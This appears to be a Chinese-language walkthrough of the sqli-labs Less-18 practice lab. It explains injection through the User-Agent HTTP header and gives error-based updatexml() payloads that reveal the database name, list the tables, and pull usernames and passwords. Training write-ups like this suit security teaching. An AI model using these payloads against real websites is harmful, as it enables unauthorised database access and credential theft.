sqlilab-Less-18

知识铺垫

User-Agent 首部包含了一个特征字符串，用来让网络协议的对端来识别发起请求的用户代理软件的应用类型、操作系统、软件开发商以及版本号。user-agent的作用。通过识别用户身份，响应合适的web界面，所以更改可以让电脑返回一个手机界面，是不是很神奇

User-Agent: Mozilla/<version> (<system-information>) <platform> (<platform-details>) <extensions>

那为什么http头部可以进行注入？结合网上资料由于大部分网站为了记录用户的http请求头部内容，来更好的识别用户的身份信息，会将其带入数据库处理。任何与数据库交互的地方都是有可能会有sql注入漏洞的。没有对http头部内容进行验证和过滤，导致攻击者可以任意篡改http头部信息拼接到数据库恶意获取敏感内容。

题目解析

一个新的类型的关卡，从这里到后面的几关都是HTTP头部注入，来到这关后就可以看到这里显示我们的ip地址，我们尝试输入正确的用户名+正确的密码，会出现user agent,但是错误的账号，则不会显示，，说明我们要从这里入手，那么问题就很简单了，那么我们就可以尝试抓包然后在User-Agent中进行注入

当我们在后面加上单引号的时候，发现页面报错了

admin是我们的用户名，127.0.0.1是我们的地址，他可能把我们这是三个打印出来，然后在显示出来，我们可以一下，传入三个字符串，这里我尝试构造一个 ,1,1)#，成功了。

查看源码

接下来就简单多了

爆数据库

User-Agent: ''1' and updatexml(1,concat(0x3a,(select database()),0x3a),1),1,1)#

爆表名

User-Agent:1' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1) and'

第一个这样子长度受限制了，只能一个个去尝试了

User-Agent:1' and updatexml(1,concat(1,(select group_concat(username,'~',password) from users)),1) and'

User-Agent:1' and updatexml(1,concat(1,(select concat(username,'~',password) from users limit 0,1)),1) and'